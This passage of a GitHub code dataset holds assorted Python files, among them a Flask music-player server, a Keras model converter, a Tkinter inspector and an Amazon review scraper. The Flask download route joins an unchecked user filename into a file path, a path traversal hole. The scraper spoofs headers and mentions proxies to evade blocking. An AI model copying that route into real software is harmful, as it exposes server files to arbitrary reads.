print(\"Stopping..\")\n player.stop()\n exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n@app.route(\"/\")\ndef index(msg='Click next/prev to start playing'):\n songs = player.get_songs()\n return render_template('index.html',song_list = songs,ret_msg=msg)\n\n# play related methods\n@app.route(\"/next/\", methods=['POST'])\ndef next_song():\n player.next_song()\n return index(\"next song playing\")\n\n@app.route(\"/prev/\", methods=['POST'])\ndef prev_song():\n player.prev_song()\n return index(\"prev song playing\")\n\n@app.route(\"/stop/\",methods=['POST'])\ndef stop_song():\n player.pause()\n return index(\"song (un)paused\")\n\n@app.route(\"/soundUp/\",methods=['POST'])\ndef sound_up():\n call([\"/usr/bin/amixer\", \"-M\", \"set\", \"Master\", \"9%+\"])\n return \"volume up\"\n\n@app.route(\"/soundDown/\",methods=['POST'])\ndef sound_down():\n call([\"/usr/bin/amixer\", \"-M\", \"set\", \"Master\", \"9%-\"])\n return \"volume up\"\n\n# file upload\ndef allowed_file(filename):\n ALLOWED_EXTENSIONS = {'mp3', 'ogg', 'wav'}\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/upload/', methods = ['POST'])\ndef upload_file():\n f = request.files['file']\n if allowed_file(f.filename):\n filename = secure_filename(f.filename)\n f.save(os.path.join('./songs/',filename))\n player.get_songs()\n player.load_song()\n return index('file uploaded successfully')\n else:\n return index(\"Wrong file extension\")\n# file download\n\n@app.route('/download/',methods =['POST'])\ndef downloadFile ():\n f = request.json['filename']\n return send_file('./songs/'+f, as_attachment=True)\n \n# run the application\nif __name__ == \"__main__\":\n # init player\n player.get_songs()\n player.select_song(0)\n player.load_song()\n\n # run server\n app.run(host='0.0.0.0',port=8810)","repo_name":"Kornelos/lines-music-player","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27616580153","text":"# -*- coding:utf-8 -*-\n__author__ = 'ShawDa'\n\n\nclass Solution:\n def canJump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n max_reach = 0\n for i in range(len(nums)):\n if i > max_reach:\n return False\n max_reach = max(max_reach, i+nums[i])\n if max_reach >= len(nums)-1:\n return True\n return True\n\n def canJump1(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n # 从后往前,找最前一个之后第一个能到末端的,如果第一个能到这,那么就可以\n if not nums:\n return True\n nums, res = nums[::-1], 0\n for i in range(1, len(nums)):\n if nums[i] + res >= i:\n res = i # res求得就是能到第一个的位置\n return res == len(nums)-1\n","repo_name":"ShawDa/Coding","sub_path":"leetcode/055跳跃游戏.py","file_name":"055跳跃游戏.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42556245849","text":"import numpy as np\r\nimport ruptures as rpt\r\n\r\n\r\ndef compute_snr(signal: np.ndarray, noise: np.ndarray) -> float:\r\n \"\"\"\r\n Computes the Signal-to-Noise Ratio (SNR) between a signal and noise.\r\ns\r\n Parameters:\r\n signal (np.ndarray): The signal.\r\n noise (np.ndarray): The noise.\r\n\r\n Returns:\r\n float: The Signal-to-Noise Ratio (SNR) in decibels (dB).\r\n \"\"\"\r\n\r\n # Calculate the power of the signal and noise\r\n signal_power = np.mean(signal**2)\r\n noise_power = np.mean(noise**2)\r\n\r\n # Calculate the Signal-to-Noise Ratio (SNR) in decibels (dB)\r\n snr = 10 * np.log10(signal_power / noise_power)\r\n\r\n return snr\r\n\r\n\r\ndef generate_signals(\r\n n_informative_dimensions: int,\r\n length: int,\r\n n_dimensions: int,\r\n n_bkps: int,\r\n sigma: float,\r\n):\r\n \"\"\"\r\n Generates synthetic signals with informative and noisy dimensions.\r\n\r\n Parameters:\r\n n_informative_dimensions (int): Number of informative dimensions in the signal.\r\n length (int): Length of the generated signal.\r\n n_dimensions (int): Total number of dimensions in the generated signal.\r\n n_bkps (int): Number of breakpoints where in the signal along informatives dimensions.\r\n sigma (float): Standard deviation of the noise to be added.\r\n\r\n Returns:\r\n tuple: A tuple containing:\r\n - noisy_signal (np.ndarray): The generated noisy signal with informative and noisy dimensions.\r\n - segmentation (np.ndarray): The segmentation points.\r\n - snr (float): Signal-to-Noise Ratio (SNR) of the generated signal.\r\n \"\"\"\r\n\r\n # Generate informative and noisy segments separately\r\n signal, segmentation = rpt.pw_constant(\r\n length, n_informative_dimensions, n_bkps, noise_std=0\r\n )\r\n noisy_signal, _ = rpt.pw_constant(\r\n length, n_dimensions - n_informative_dimensions, 0, noise_std=0\r\n )\r\n\r\n # Combine the informative and noisy segments into the final signal\r\n final_signal = np.zeros((length, n_dimensions))\r\n final_signal[:, 0:n_informative_dimensions] = signal\r\n final_signal[:, n_informative_dimensions:n_dimensions] = noisy_signal\r\n\r\n # Normalize the signal to have zero mean and unit variance\r\n normalized_signal = (final_signal - np.mean(final_signal)) / np.std(final_signal)\r\n\r\n # Generate noise with the specified standard deviation\r\n noise = np.random.normal(0, sigma, normalized_signal.shape)\r\n\r\n # Add the noise to the normalized signal to create the noisy signal\r\n noisy_signal = normalized_signal + noise\r\n\r\n # Calculate the Signal-to-Noise Ratio (SNR) of the generated signal\r\n snr = compute_snr(\r\n normalized_signal, noise\r\n ) # Assuming compute_snr function is defined\r\n\r\n return noisy_signal, segmentation, snr\r\n","repo_name":"simonblotas/segmentation_notebook_version","sub_path":"data_generation.py","file_name":"data_generation.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"872627059","text":"from dataclasses import dataclass\nimport tkinter\nfrom tkinter import ttk\nfrom typing import List, Literal, Optional\nfrom tkinter.messagebox import showinfo\nfrom web.dom.CharacterData import CharacterData\nfrom web.dom.DocumentType import DocumentType\nfrom web.dom.Node import Node\nfrom utils import log\n\n@dataclass\nclass NetworkRequest:\n url: str\n request_type: Literal[\"GET\", \"POST\"]\n response_code: int\n response_size: int\n\n\nclass Inspector:\n def __init__(self, url: str, browser, dom: Optional[DocumentType] = None) -> None:\n self.url = url\n self.browser = browser\n self.dom: Optional[DocumentType] = dom\n self.network_requests: List[NetworkRequest] = []\n self.inspector_window = tkinter.Tk(className=f'Inspector | {self.url}')\n self.inspector_window.rowconfigure(0, weight=1)\n self.inspector_window.columnconfigure(0, weight=1)\n\n self.tabControl = ttk.Notebook(self.inspector_window)\n self.elements = ttk.Frame(self.tabControl)\n self.elements.rowconfigure(0, weight=1)\n self.elements.columnconfigure(0, weight=1)\n\n self.network = ttk.Frame(self.tabControl)\n self.network.rowconfigure(0, weight=1)\n self.network.columnconfigure(0, weight=1)\n\n self.tabControl.add(self.elements, text='Elements')\n self.tabControl.add(self.network, text='Network')\n\n self.tabControl.pack(expand=1, fill=\"both\")\n \n def on_closing():\n log(\"On close\")\n from browser.globals import BrowserState\n BrowserState.remove_inspector(self)\n self.inspector_window.destroy()\n self.inspector_window.protocol(\"WM_DELETE_WINDOW\", on_closing)\n network_columns = ('url', 'request_type', 'response_code', \"response_size\")\n\n self.network_treeview = ttk.Treeview(self.network, columns=network_columns, show='headings')\n self.elements_treeview = ttk.Treeview(self.elements)\n\n # define headings\n self.network_treeview.heading('url', text='Url')\n self.network_treeview.heading('request_type', text='Request type')\n self.network_treeview.heading('response_code', text='Response code')\n self.network_treeview.heading('response_size', text='Response size')\n \n #self.elements_treeview['columns'] = ['#1']\n\n self.elements_treeview.heading(\"#0\", text=\"Element\", anchor=tkinter.W)\n\n #self.elements_treeview.heading('#0', text='Element')\n\n\n def network_item_selected(event) -> None:\n for selected_item in self.network_treeview.selection():\n item = self.network_treeview.item(selected_item)\n record = item['values']\n # show a message\n showinfo(title='Information', message=','.join(record))\n\n\n self.network_treeview.bind('<>', network_item_selected)\n\n def element_item_selected(event) -> None:\n from browser.globals import BrowserState\n BrowserState.set_selected_elements(self.elements_treeview.selection())\n self.browser.redraw()\n\n self.elements_treeview.bind('<>', element_item_selected)\n\n self.network_treeview.grid(row=0, column=0, sticky='nsew')\n self.elements_treeview.grid(row=0, column=0, sticky='nsew')\n\n # add a scrollbar\n elements_treeview_scrollbar = ttk.Scrollbar(self.network, orient=tkinter.VERTICAL, command=self.elements_treeview.yview)\n self.network_treeview.configure(yscroll=elements_treeview_scrollbar.set)\n elements_treeview_scrollbar.grid(row=0, column=1, sticky='ns')\n\n elements_treeview_scrollbar = ttk.Scrollbar(self.network, orient=tkinter.VERTICAL, command=self.elements_treeview.yview)\n self.elements_treeview.configure(yscroll=elements_treeview_scrollbar.set)\n\n if self.dom:\n self.update_dom(dom)\n\n\n\n def update_network_view(self) -> None:\n for request in self.network_requests:\n self.network_treeview.insert('', tkinter.END, values=(request.url, request.request_type, request.response_code, request.response_size))\n\n def __add_node_to_elements_view(self, node: Node, id: str, parent_id: Optional[str]) -> None:\n if parent_id:\n if isinstance(node, CharacterData):\n # TODO: Update html tokenizer/parser to remove 'empty' CharacterData elements.\n if not node.data.isspace():\n self.elements_treeview.insert(str(parent_id), tkinter.END, text=f\"{node.data.strip()}\", iid=id, open=False)\n else:\n self.elements_treeview.insert(str(parent_id), tkinter.END, text=f\"<{node.name}>\", iid=id, open=False)\n #parent_child_count = len(self.elements_treeview.get_children(str(parent_id)))\n #log(\"Child\", parent_child_count)\n #self.elements_treeview.move(str(id), str(parent_id), parent_child_count)\n else:\n self.elements_treeview.insert('', tkinter.END, text=f\"<{node.name}>\", iid=id, open=False) \n \n for child in node.children:\n self.__add_node_to_elements_view(child, str(child.id), id)\n\n def update_elements_view(self) -> None:\n if not self.dom: return\n for child in self.dom.children:\n self.__add_node_to_elements_view(child, str(child.id), None)\n\n def clear_elements_view(self) -> None:\n if not self.dom: return\n self.elements_treeview.delete(*self.elements_treeview.get_children())\n\n def update_url(self, url: str) -> None:\n self.url = url\n self.inspector_window.title(url)\n\n def update_dom(self, dom: DocumentType) -> None:\n if self.dom:\n self.clear_elements_view()\n self.dom = dom\n self.update_elements_view()\n\n\n def add_network_request(self, request: NetworkRequest) -> None:\n self.network_requests.append(request)\n self.update_network_view()\n \n def clear_network_requests(self) -> None:\n self.network_requests = []\n self.network_treeview.delete(*self.network_treeview.get_children())\n\n\n\n ","repo_name":"aaralh/theBrowser","sub_path":"browser/Inspector.py","file_name":"Inspector.py","file_ext":"py","file_size_in_byte":6110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44649402094","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n# TensorFlow and tf.keras\nimport os\n# 0 = all messages are logged (default behavior)\n# 1 = INFO messages are not printed\n# 2 = INFO and WARNING messages are not printed\n# 3 = INFO, WARNING, and ERROR messages are not printed\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '1'\nimport tensorflow as tf\n\n# Helper libraries\nimport os\nimport sys\nimport time\nimport argparse\n\nfrom src.data import cifar100\nfrom src.convert.keras import freeze_graph, convert_tf_lite\nfrom src.utils.color_utils import bcolors\nfrom src.utils.logger import Logging\nfrom src.utils import file_utils\nLogging.attach_stdout()\n# HuliLogging.debug_dim()\n# HuliLogging.info_blue()\n# HuliLogging.warn_yellow()\n# HuliLogging.error_red()\n\nSUPPORTED_INPUTS = [file_utils.EXTENSION_H5]\n\nSUPPORTED_OUTPUTS = [file_utils.EXTENSION_PB, os.path.splitext(file_utils.EXTENSION_INT8_TFLITE)[1]]\n\nlogger = Logging.get_logger(__name__)\n\n\ndef line():\n return '=' * 50\n\n\nprint(line())\nprint(tf.__name__, '-', tf.__version__, sep='')\nprint(line())\n\n\ndef log_bold(*argv, **kwargs):\n logger.info(line() + ' ' + argv[0] + ' ' + line(), *argv[1:], **kwargs)\n\n\ndef get_args():\n p = argparse.ArgumentParser()\n p.add_argument('-i', '--input', help=\"Model to use\", required=True)\n p.add_argument('-o', '--output', help=\"Location to write output model to\", required=True)\n p.add_argument('-d', '--representative_data',\n help=\"Name of representative data (required for quantization conversions)\", required=False)\n args = p.parse_args()\n assert os.path.splitext(args.input)[1] in SUPPORTED_INPUTS, '%s not in %s' % (args.input, SUPPORTED_INPUTS)\n assert os.path.splitext(args.output)[1] in SUPPORTED_OUTPUTS, '%s not in %s' % (args.output, SUPPORTED_OUTPUTS)\n assert args.output[-len(file_utils.EXTENSION_INT8_TFLITE):] != file_utils.EXTENSION_INT8_TFLITE \\\n or args.representative_data is not None, \\\n 'Must pass representative data for %s conversion' % file_utils.EXTENSION_INT8_TFLITE\n return args\n\n\ndef get_data(representative_data):\n if representative_data is None:\n return None\n elif representative_data == cifar100.NAME:\n (train_x, train_y), (test_x, test_y) = cifar100.load_data()\n return train_x\n else:\n assert 1 == 0, 'Unexpected representative_data: %s' % representative_data\n\n\ndef convert(input, output, representative_data=None):\n input_ext = os.path.splitext(input)[1]\n assert input_ext == file_utils.EXTENSION_H5, 'Unexpected input file type: %s' % input\n\n output_ext = os.path.splitext(output)[1]\n assert output_ext in [file_utils.EXTENSION_PB, os.path.splitext(file_utils.EXTENSION_INT8_TFLITE)[1]],\\\n 'Unexpected output file type: %s' % output\n\n if output_ext == file_utils.EXTENSION_PB:\n if representative_data is not None:\n logger.warn('No need to pass representative data for %s conversion', file_utils.EXTENSION_PB)\n ret = freeze_graph(input, output)\n elif output_ext == os.path.splitext(file_utils.EXTENSION_INT8_TFLITE)[1]:\n assert representative_data is not None, 'representative_data is None'\n ret = convert_tf_lite(input, output, representative_data=representative_data)\n else:\n ret = -1\n return ret\n\n\ndef main():\n # Args\n log_bold('PARSE')\n args = get_args()\n input_ = args.input\n output = args.output\n representative_data = get_data(args.representative_data)\n\n ret = convert(input_, output, representative_data=representative_data)\n if ret != 0:\n logger.error('Convert failed with error %d', ret)\n return ret\n\n return 0\n\n\nif __name__ == '__main__':\n now_ = time.time()\n logger.info('')\n logger.info('')\n bcolors.light_cyan(logger.info, '> ' + ' '.join(sys.argv))\n\n ret_ = 0\n try:\n main()\n except Exception as e:\n logger.exception('Uncaught exception: %s', e)\n ret_ = 1\n logger.info('')\n bcolors.light_cyan(logger.info, '> ' + ' '.join(sys.argv))\n logger.info('')\n\n if ret_ == 0:\n bcolors.light_green(logger.info, '[%.3fs] SUCCESS!!!',time.time() - now_)\n else:\n bcolors.light_red(logger.error, '[%.3fs] FAIL!!!', time.time() - now_)\n\n exit(ret_)\n","repo_name":"stoooops/deep-learning-archive","sub_path":"bin/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19348757651","text":"import os\nimport shutil\nfrom tabulate import tabulate\nfrom cProfile import Profile\nimport pstats\nimport matplotlib.pyplot as plt\n\n\ndef plot_losses(training_losses, validation_losses, savepath=\"./losses.png\"):\n fig = plt.figure()\n plt.plot(validation_losses, label=\"Validation set loss\")\n plt.plot(training_losses, label=\"Training set loss\")\n\n plt.legend()\n plt.xlabel(\"Epochs\")\n\n plt.savefig(savepath)\n\n\ndef plot_histograms(self, data):\n fig, axs = plt.subplots(len(data))\n for index, k in enumerate(data):\n if len(data) == 1:\n ax = axs\n else:\n ax = axs[index]\n\n ax.hist(data[k])\n ax.set_label(k)\n\n plt.show()\n\n\ndef dump_values(x, a, z, w, dw, db, epoch):\n dir = \"./epoch_{}_values\".format(epoch)\n\n if os.path.exists(dir) and os.path.isdir(dir):\n shutil.rmtree(dir)\n\n os.makedirs(dir)\n data = {\"a\": a, \"z\": z, \"w\": w, \"dw\": dw, \"db\": db}\n\n for d in data:\n vals = data[d]\n\n for index, arr in enumerate(vals):\n with open(os.path.join(dir, \"{}{}\".format(d, index+1)), \"w\") as f:\n table = tabulate(arr)\n f.write(table + \"\\n\")\n\n with open(os.path.join(dir,\"x\"), \"w\") as f:\n table = tabulate(x)\n f.write(table + \"\\n\")\n\n\ndef profile(sort_args=['cumulative'], print_args=[10]):\n profiler = Profile()\n\n def decorator(fn):\n def inner(*args, **kwargs):\n result = None\n try:\n result = profiler.runcall(fn, *args, **kwargs)\n finally:\n stats = pstats.Stats(profiler)\n stats.strip_dirs().sort_stats(*sort_args).print_stats(*print_args)\n return result\n return inner\n return decorator","repo_name":"adamantmc/backpropagation","sub_path":"nn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32837485576","text":"import random\nfrom card_class import Card\nfrom deck_class import Deck\nfrom hand_class import Hand\n\n\ndef get_correct_input(target_list, user_input, change_to_int=0):\n while user_input not in target_list:\n user_input = input(\"Please enter proper input ==>> \")\n\n if change_to_int == 1:\n return int(user_input)\n else:\n return user_input\n\n\ndef get_user_bet(u_money):\n str_list = []\n for i in range(1, u_money + 1):\n str_list.append(str(i))\n\n print(\"You have $\", u_money, sep=\"\")\n bet = input(\"Please enter your bet in whole USD (You must bet some amount) ==>> \")\n return get_correct_input(str_list, bet, 1)\n\n\ndef get_cpu_bet(cpu_money):\n return random.randint(1, cpu_money)\n\n\ndef get_pot(u_bet, u_money, cpu_bet, cpu_money):\n return (u_bet + cpu_bet), (u_money - u_bet), (cpu_money - cpu_bet)\n\n\n\"\"\"The game starts here\"\"\"\nplay_again = \"Yes\"\nwhile play_again == \"Yes\":\n user_money = 10000\n cpu1_money = 10000\n while user_money > 0 and cpu1_money > 0:\n user_bet = get_user_bet(user_money)\n cpu1_bet = get_cpu_bet(cpu1_money)\n print(\"The computer bet $\", cpu1_bet, sep=\"\")\n\n pot, user_money, cpu1_money = get_pot(user_bet, user_money, cpu1_bet, cpu1_money)\n\n new_deck = Deck\n new_deck.shuffle()\n user_hand = Hand()\n cpu1_hand = Hand()\n\n user_hand.add_to_hand(new_deck.deal())\n cpu1_hand.add_to_hand(new_deck.deal())\n user_hand.add_to_hand(new_deck.deal())\n cpu1_hand.add_to_hand(new_deck.deal())\n\n user_hand.print_hand()\n\n play_again = input(\"Would you like to play again? (Enter 'Yes' or 'No') ==>> \")\n play_again = get_correct_input([\"Yes\", \"No\"], play_again) # comment added\n print(\"Hello World\")\n","repo_name":"zrfuhrmann/blackjack_game_2","sub_path":"main_gambling_game.py","file_name":"main_gambling_game.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72097211752","text":"from datetime import timedelta, datetime\nimport requests\nimport json\nfrom pytz import timezone\nfrom settings import log\nimport settings\n\n\n# Old function\n# def utc_to_local(utc_dt):\n# return utc_dt.astimezone(settings.TIMEZONE)\n\ndef utc_to_local(utc_dt, hours):\n return utc_dt + timedelta(hours=hours)\n\n\ndef getUserState(chat_id):\n r = requests.get(settings.BASE_URL + settings.get_tg_users +\n str(chat_id), headers=settings.master_token)\n responce = r.json()\n user_id = json.loads(json.dumps(responce['id']))\n is_active = json.loads(json.dumps(responce['is_active']))\n log.info(f\"request user state for id: {user_id} by {chat_id}\")\n if is_active:\n return True\n else:\n return False\n\n\ndef getUserID(chat_id):\n r = requests.get(settings.BASE_URL + settings.get_tg_users +\n str(chat_id), headers=settings.master_token)\n responce = r.json()\n user_id = json.loads(json.dumps(responce['id']))\n log.info(f\"request user id ({user_id}) from: {chat_id}\")\n return user_id\n\n\ndef getData(user_id):\n r = requests.get(settings.BASE_URL + settings.get_data +\n str(user_id), headers=settings.master_token)\n responce = r.json()\n data = json.loads(json.dumps(responce[0]['data']))\n date = utc_to_local(datetime.fromisoformat(responce[0]['datetime']), 9)\n reply_date_msg = f\"Time: {date.strftime('%H:%M %d.%m.%Y')}\"\n reply_data_msg = \"\\n\".join(f'{k}: {v}' for k, v in data.items())\n return reply_date_msg + \"\\n\" + reply_data_msg\n","repo_name":"ab-413/iot-bot","sub_path":"methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1669485756","text":"class Solution:\n def detectCapitalUse(self, word: str) -> bool:\n answer, count, index = False, 0, 0\n for i, c in enumerate(word):\n if ord('A') <= ord(c) <= ord('Z'):\n count += 1\n index = i\n \n if (count == len(word)) or (count == 1 and index == 0) or count == 0:\n answer = True\n \n return answer","repo_name":"slackjawed12/codetest","sub_path":"LeetCode/Easy/0520-detect-capital/0520-detect-capital.py","file_name":"0520-detect-capital.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2298991577","text":"from appium import webdriver\n\nfrom library.mobile import configs, parallel\nfrom library.mobile.devices import get_device_id\n\n\nclass SingletonFactory(object):\n \"\"\"\n A factory of the same instances of injected classes.\n \"\"\"\n\n # a mapping between the name of a class and the instance.\n mappings = {}\n\n @staticmethod\n def get_instance(device_id: str):\n if device_id in SingletonFactory.mappings:\n return SingletonFactory.mappings[device_id]\n else:\n return None\n\n @staticmethod\n def build(device_id, **constructor_args):\n \"\"\"\n Builds an instance of the given class pointer together\n with the provided constructor arguments.\n Returns the SAME instance for a given class.\n\n :param device_id: A pointer to the device driver instance.\n :param constructor_args: The arguments for the class instance.\n :return: An instance of the provided class.\n \"\"\"\n\n # if the class instance is mapped, then retrieve it.\n instance_ = SingletonFactory.get_instance(device_id)\n # else create the instance and map it to the class name.\n if not instance_:\n instance_ = webdriver.Remote(**constructor_args)\n SingletonFactory.mappings[str(device_id)] = instance_\n\n return instance_\n\n\ndef get_appium_server():\n import json\n import os\n\n # Load default capabilities per platform\n caps_path = os.path.join(configs.PROJECT_PATH, \"configs\", \"capabilities.json\")\n with open(caps_path) as caps_file:\n appium_config = json.load(caps_file).get(\"appium\")\n port = parallel.device_index(appium_config[\"availablePorts\"])\n return \"http://{0}:{1}/wd/hub\".format(appium_config[\"ip\"], port)\n\n\ndef create_appium_session(udid: str, capabilities: dict):\n return SingletonFactory.build(\n udid, command_executor=get_appium_server(), desired_capabilities=capabilities,\n )\n\n\ndef get_driver(udid: str = get_device_id()) -> webdriver.Remote:\n \"\"\"\n Return the same instance to the Appium driver.\n \"\"\"\n if udid in SingletonFactory.mappings:\n return SingletonFactory.mappings[udid]\n else:\n return create_appium_session(get_device_id(), configs.CAPABILITIES)\n\n\ndef quit_driver():\n \"\"\"\n Close Mobile app and delete reference at singleton, so device_id can re-initiate\n \"\"\"\n udid = get_device_id()\n driver = get_driver(udid)\n driver.quit()\n SingletonFactory.mappings.pop(udid)\n","repo_name":"penguji/sancaQA","sub_path":"library/mobile/drivers.py","file_name":"drivers.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"71707244072","text":"from sympy import symbols, diff\n\n\nx, y = symbols('x y')\n\nf = (x + 1)**2 + 8 * (y ** 2) - 3 * x - y + 1\ng = ((x + 1)**2 + y**2) * ((x - 1)**2 + y**2)\n\ndf_dx = diff(f, x)\ndf_dy = diff(f, y)\n\ndg_dx = diff(g, x)\ndg_dy = diff(g, y)\n\nprint(df_dx, df_dy)\nprint(dg_dx, dg_dx)\n","repo_name":"anutabutsko/algorithms","sub_path":"src/optimization/derivative_calc.py","file_name":"derivative_calc.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28475233718","text":"import os\nimport os.path\nimport logging\nimport pygsheets\nfrom infra.run.common import IS_WINDOWS\n\n\nclass Sheets(object):\n \"\"\"\n Wrapper for google sheets using pygsheets.\n \"\"\"\n SPAM_LOGGERS = ('googleapiclient.discovery', 'oauth2client.transport', 'oauth2client.crypt', 'oauth2client.client')\n _logger = logging.getLogger('google.sheets')\n\n\n def __init__(self, service_account):\n self._sheets = pygsheets.authorize(service_file=service_account, no_cache=IS_WINDOWS)\n self._worksheet_cache = {}\n\n def append_worksheet_table(self, sheet_name, worksheet, *values):\n _key = (sheet_name, worksheet)\n if _key not in self._worksheet_cache:\n sheet = self._sheets.open(sheet_name)\n worksheet = sheet.worksheet_by_title(worksheet)\n if worksheet is None:\n raise KeyError('no %s worksheet in %s sheet' % _key[::-1])\n self._logger.debug('open %s.%s worksheet', *_key)\n self._worksheet_cache[_key] = worksheet\n self._worksheet_cache[_key].append_table(values=values)\n","repo_name":"arduino12/infra","sub_path":"modules/google/sheets/sheets.py","file_name":"sheets.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15196583849","text":"N, K = map(int, input().split())\r\nAns = 0\r\n\r\nif K == 0:\r\n print(N**2)\r\nelse:\r\n def Mods(i, N, K): #i???????K???N????\r\n lim = N//i\r\n pattern = i - K\r\n total = lim * pattern\r\n if N - i * lim < K:\r\n return total\r\n else:\r\n extra = N - i * lim - K + 1\r\n return total + extra\r\n\r\n for i in range(K+1, N+1):\r\n Ans += Mods(i, N, K)\r\n print(Ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc091/B/3635255.py","file_name":"3635255.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"10890910663","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"TheLogicMaster\",\n version=\"0.0.1\",\n author=\"Justin Marentette\",\n author_email=\"justinmarentette11@gmail.com\",\n description=\"A Webkinz mini-game bot\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/TheLogicMaster/WebkinzBot\",\n packages=setuptools.find_packages(),\n install_requires=[\n 'opencv-python', 'pynput', 'numpy', 'colormath', 'pyscreenshot', 'pyautogui', 'Pillow'\n ],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)","repo_name":"TheLogicMaster/WebkinzBot","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"12286124989","text":"from charles_dev.daikin_device import DaikinDevice\nfrom homeassistant.helpers.entity import DeviceInfo, Entity\n\nfrom .const import _LOGGER, DOMAIN\n\n\nclass DaikinEntity(Entity):\n \"\"\"Base class for Daikin stuff.\"\"\"\n\n _attr_has_entity_name = True\n\n def __init__(self, device: DaikinDevice) -> None:\n self._device = device\n self._attr_unique_id = device.mac\n\n self._attr_device_info = DeviceInfo(\n identifiers={(DOMAIN, device.mac)},\n name=device.name,\n manufacturer=\"Daikin\",\n )\n device.add_update_callback(self.on_data_updated)\n\n def on_data_updated(self):\n \"\"\"Callback from the DaikinDevice class when the data model changes.\"\"\"\n _LOGGER.debug(\"Device Data updated:\")\n self._attr_device_info[\"model\"] = self._device.device_data.manufacturer.text\n self._attr_device_info[\"name\"] = self._device.device_data.name\n self.async_schedule_update_ha_state()\n","repo_name":"crossan007/hacs-daikin-cloud-na","sub_path":"custom_components/daikinone/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10785172236","text":"from selectorlib import Extractor\nimport requests \nimport json \nfrom time import sleep\nimport csv\nfrom dateutil import parser as dateparser\n\n# Create an Extractor by reading from the YAML file\ntry:\n e = Extractor.from_yaml_file('selectors.yml')\nexcept:\n e = Extractor.from_yaml_file('Scraper/selectors.yml')\n\ndef scrape(url): \n headers = {\n 'authority': 'www.amazon.com',\n 'pragma': 'no-cache',\n 'cache-control': 'no-cache',\n 'dnt': '1',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'sec-fetch-site': 'none',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-dest': 'document',\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',\n }\n\n # Download the page using requests\n print(\"Downloading %s\"%url)\n r = requests.get(url, headers=headers)\n # print(r.text)\n # Simple check to check if page was blocked (Usually 503)\n if \"To discuss automated access to Amazon data\" in r.text:\n print(\"Page %s was blocked by Amazon. Please try using better proxies\\n\"%url)\n # Pass the HTML of the page and create \n # print(e.extract(r.text))\n return e.extract(r.text)\n\n# product_data = []\ndef read_urls(urls):\n\n with open('data.csv','w') as outfile:\n writer = csv.DictWriter(outfile, fieldnames=[\"title\",\"content\",\"date\",\"variant\",\"images\",\"verified\",\"author\",\"rating\",\"product\",\"url\"],quoting=csv.QUOTE_ALL)\n writer.writeheader()\n for url in urls:\n data = scrape(url)\n try:\n\n if data:\n for r in data['reviews']:\n r[\"product\"] = data[\"product_title\"]\n r['url'] = url\n # print(r)\n if 'verified' in r:\n if 'Verified Purchase' in r['verified']:\n r['verified'] = 'Yes'\n else:\n r['verified'] = 'no'\n r['rating'] = r['rating'].split(' out of')[0]\n date_posted = r['date'].split('on ')[-1]\n if r['images']:\n r['images'] = \"\\n\".join(r['images'])\n r['date'] = dateparser.parse(date_posted).strftime('%d %b %Y')\n writer.writerow(r)\n\n except:\n print(\"No data\")\n\n \n\ndef 